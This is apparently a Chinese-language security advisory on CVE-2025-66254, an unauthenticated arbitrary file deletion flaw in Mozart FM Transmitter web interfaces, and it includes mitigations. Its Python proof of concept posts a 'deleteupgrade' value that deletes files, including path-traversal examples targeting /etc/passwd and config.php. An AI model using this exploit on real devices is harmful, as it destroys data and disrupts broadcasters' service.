CVE-2025-66254: DB Electronica Mozart FM Transmitter未授权任意文件删除漏洞

漏洞信息

漏洞编号

CVE-2025-66254

漏洞类型

任意文件删除

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter (版本30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000)

漏洞概述

CVE-2025-66254是DB Electronica Telecomunicazioni S.p.A.生产的Mozart FM Transmitter设备中存在的一个严重安全漏洞。该漏洞存在于Web界面的upgrade_contents.php文件中，由于deleteupgrade参数缺乏适当的身份验证、路径验证和文件扩展名限制，攻击者可以在无需任何认证的情况下，远程删除服务器上/var/www/upload/目录中的任意文件。Mozart FM Transmitter是一款广泛应用于广播行业的专业调频发射设备，其Web管理界面存在此漏洞意味着攻击者可以通过构造恶意请求，删除系统关键文件、配置文件或应用程序代码，从而导致服务中断、数据丢失甚至完全接管系统控制权。该漏洞CVSS评分高达9.1，属于严重级别，对使用受影响版本设备的广播机构构成重大安全威胁。

技术细节

该漏洞的技术根源在于/var/www/upgrade_contents.php文件中的deleteupgrade参数处理逻辑存在严重缺陷。具体问题包括：(1) 缺少认证检查：deleteupgrade参数的处理代码未验证请求者是否具有管理员权限，任何匿名用户均可发起请求；(2) 缺乏路径安全检查：参数直接接受用户输入的文件路径，未进行路径规范化或边界检查，导致可以使用路径遍历技术访问upload目录之外的系统文件；(3) 无文件类型限制：未对可删除文件类型进行限制，理论上可以删除任意后缀的文件；(4) 缺少权限验证：未检查文件所有权或当前进程权限。攻击者可以通过发送精心构造的HTTP POST请求，指定deleteupgrade参数为任意文件路径（如../../etc/passwd或../../var/www/config.php），实现任意文件删除。成功利用此漏洞可导致Web应用功能丧失、系统配置文件被破坏、敏感数据泄露，甚至通过删除安全配置实现进一步的攻击。

攻击链分析

STEP 1

信息收集

攻击者识别目标设备为Mozart FM Transmitter，确认Web管理界面可访问

STEP 2

漏洞探测

访问upgrade_contents.php文件，发现deleteupgrade参数可被未认证用户调用

STEP 3

构造恶意请求

构造包含deleteupgrade参数的HTTP POST请求，指定目标文件路径

STEP 4

路径遍历攻击

使用../进行路径遍历，尝试访问upload目录外的系统文件

STEP 5

执行文件删除

发送恶意请求，服务器执行文件删除操作且无权限验证

STEP 6

扩大攻击面

删除关键配置文件或安全防护文件，为后续远程代码执行铺路

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2025-66254 PoC - Unauthenticated Arbitrary File Deletion
# Target: DB Electronica Mozart FM Transmitter
# Vulnerability: deleteupgrade parameter in /var/www/upgrade_contents.php

TARGET_URL = "http://target-ip/upgrade_contents.php"

def delete_file(filepath):
    """Send request to delete arbitrary file via deleteupgrade parameter"""
    payload = {
        'deleteupgrade': filepath
    }
    response = requests.post(TARGET_URL, data=payload, timeout=10)
    return response.status_code, response.text

# Example 1: Delete a file in upload directory
filepath1 = "example.txt"
status, resp = delete_file(filepath1)
print(f"Delete {filepath1}: Status {status}")

# Example 2: Path traversal to delete system file
# filepath2 = "../../etc/passwd"
# status, resp = delete_file(filepath2)
# print(f"Delete system file: Status {status}")

# Example 3: Delete application configuration
# filepath3 = "../../var/www/config.php"
# status, resp = delete_file(filepath3)
# print(f"Delete config: Status {status}")

影响范围

Mozart FM Transmitter 版本 30

Mozart FM Transmitter 版本 50

Mozart FM Transmitter 版本 100

Mozart FM Transmitter 版本 300

Mozart FM Transmitter 版本 500

Mozart FM Transmitter 版本 1000

Mozart FM Transmitter 版本 2000

Mozart FM Transmitter 版本 3000

Mozart FM Transmitter 版本 3500

Mozart FM Transmitter 版本 6000

Mozart FM Transmitter 版本 7000

防御指南

临时缓解措施

立即采取以下临时缓解措施：(1)在网络层限制对upgrade_contents.php的访问，仅允许受信任的管理IP访问；(2)暂时禁用设备Web界面的文件上传和删除功能；(3)部署Web应用防火墙规则，拦截包含deleteupgrade参数和路径遍历特征的请求；(4)加强服务器文件系统权限管理，限制Web服务进程对敏感文件的写入和删除权限；(5)启用详细的访问日志和文件操作审计，及时发现异常行为；(6)联系设备厂商获取安全补丁或固件更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66254
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66254
3 Details https://www.cvedetails.com/cve/CVE-2025-66254/
4 VulDB https://vuldb.com/cve/CVE-2025-66254
5 Link https://www.abdulmhsblog.com/posts/webfmvulns/
6 Link https://www.abdulmhsblog.com/posts/webfmvulns/